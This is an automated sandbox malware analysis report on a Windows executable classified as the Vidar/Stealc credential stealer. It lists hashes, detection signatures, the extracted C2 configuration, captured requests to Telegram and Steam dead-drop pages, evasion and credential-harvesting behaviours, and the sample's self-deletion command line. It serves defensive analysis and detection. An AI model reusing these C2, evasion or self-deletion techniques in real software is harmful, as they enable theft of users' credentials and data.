
Windows Analysis Report
njrtdhadawt.exe

Overview

General Information

Sample name: njrtdhadawt.exe
Analysis ID: 1575809
MD5: 96e4917ea5d59eca7dd21ad7e7a03d07
SHA1: 28c721effb773fdd5cb2146457c10b081a9a4047
SHA256: cab6c398667a4645b9ac20c9748f194554a76706047f124297a76296e3e7a957
Tags: exe, Vidar, user-lontze7

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Self deletion via cmd or bat file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Classification

  • System is w10x64
  • njrtdhadawt.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\njrtdhadawt.exe" MD5: 96E4917EA5D59ECA7DD21AD7E7A03D07)
    • cmd.exe (PID: 7680 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7724 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "https://steamcommunity.com/profiles/76561199794498376", "Botnet": "idr7ff"}
Source | Rule | Description | Author
njrtdhadawt.exe | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
njrtdhadawt.exe | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
njrtdhadawt.exe | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

Source | Rule | Description | Author
0.2.njrtdhadawt.exe.fe0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.2.njrtdhadawt.exe.fe0000.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
0.2.njrtdhadawt.exe.fe0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.0.njrtdhadawt.exe.fe0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.0.njrtdhadawt.exe.fe0000.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: njrtdhadawt.exe Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199794498376", "Botnet": "idr7ff"}
Source: C:\ProgramData\chrome.dll ReversingLabs: Detection: 75%
Source: njrtdhadawt.exe ReversingLabs: Detection: 71%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: njrtdhadawt.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FF2080 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00FF2080
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FEA911 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,0_2_00FEA911
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FE86EF CryptUnprotectData,LocalAlloc,LocalFree,0_2_00FE86EF
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FE8696 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00FE8696
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_6CD2B040 BCryptGenRandom,SystemFunction036,0_2_6CD2B040
Source: njrtdhadawt.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: Binary string: my_library.pdbU source: njrtdhadawt.exe, chrome.dll.0.dr
Source: Binary string: my_library.pdb source: njrtdhadawt.exe, chrome.dll.0.dr
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FEC087 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FEC087
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FF61AE wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FF61AE
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FEBA79 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FEBA79
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FF5CE8 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00FF5CE8
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FE9DAF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FE9DAF
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FE1D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FE1D70
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FECEEB wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FECEEB
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FF4EA5 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00FF4EA5
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FF561A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00FF561A
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FED77A FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FED77A
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FEB719 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FEB719
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_6CD6717D FindFirstFileExW,0_2_6CD6717D
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FF531F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00FF531F
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 0_2_00FE149D
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 0_2_00FE149D

Networking

Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199794498376
Source: global traffic HTTP traffic detected: GET /asg7rd HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199794498376 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\njrtdhadawt.exe Code function: 0_2_00FE6955 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00FE6955
Source: global traffic HTTP traffic detected: GET /asg7rd HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199794498376 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: .cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NT AUTHORITY\SYSTEMWdtPWdtPWdtP.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: 76561199794498376[1].htm.0.dr String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.cloudflare.steamstat
Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englis
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
